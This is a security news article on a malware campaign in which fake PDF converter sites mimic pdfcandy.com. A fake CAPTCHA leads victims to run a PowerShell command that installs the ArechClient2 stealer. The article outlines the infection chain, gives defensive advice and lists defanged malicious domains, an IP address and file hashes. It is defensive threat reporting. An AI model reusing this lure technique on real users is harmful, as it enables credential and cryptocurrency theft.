Security researchers at CloudSEK have uncovered a sophisticated malware campaign exploiting users’ need for PDF-to-Word conversion services.
Following an FBI alert issued investigators identified several malicious websites meticulously impersonating the legitimate service pdfcandy.com, including candyxpdf[.]com and candyconverterpdf[.]com.
Sophisticated Phishing Campaign Targets Document Conversion Needs
The attack employs an elaborate social engineering strategy, presenting users with a convincing replica of the legitimate service’s interface.
Upon uploading a PDF for conversion, victims are shown a fake processing animation followed by a deceptive CAPTCHA verification prompt.
The critical infection point occurs when users are instructed to execute a PowerShell command supposedly required to complete the conversion process.
“This attack demonstrates remarkable attention to detail in mimicking trusted services,” explained CloudSEK’s research team.
“The visual elements and user flow are nearly identical to legitimate conversion tools, making detection challenging for average users.”
Technical Analysis Reveals ArechClient2 Malware
Technical analysis of the attack reveals a sophisticated multi-stage infection chain.
The PowerShell command initiates a connection to “bind-new-connect[.]click” through an obfuscated redirection chain, ultimately downloading a malicious “adobe.zip” file.
This archive contains “audiobit[.]exe,” which leverages the legitimate MSBuild.exe Windows utility to deploy ArechClient2, a variant of the SectopRAT information stealer family.
SectopRAT has been active since 2019 and is notorious for harvesting sensitive data including browser credentials, cryptocurrency wallet information, and financial details from compromised systems.
Security experts recommend using only trusted file conversion tools from official websites, maintaining updated security software, and implementing robust technical controls like DNS filtering and endpoint detection solutions.
Users should be particularly wary of any online service requesting PowerShell command execution or presenting suspicious captcha verifications during document conversion processes.
“This campaign represents a concerning evolution in social engineering tactics,” noted the researchers.
“The attackers have clearly studied user behavior and expectations around document conversion services to create a highly convincing trap.”
Organizations are advised to educate users about these threats and implement strict policies regarding the use of online file conversion tools, particularly for handling sensitive documents.
Key indicators of compromise (IOCs) identified in the investigation include the domains candyxpdf[.]com, candyconverterpdf[.]com, and bind-new-connect[.]click, along with IP address 172[.]86[.]115[.]43.
The malicious adobe.zip file (hash: 72642E429546E5AB207633D3C6A7E2E70698EF65) and its executable payload audiobit.exe (hash: 51de0b104e9ced3028a41d01dedf735809eb7f60888621027c7f00f0fcf9c834) should be flagged as high-risk indicators.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
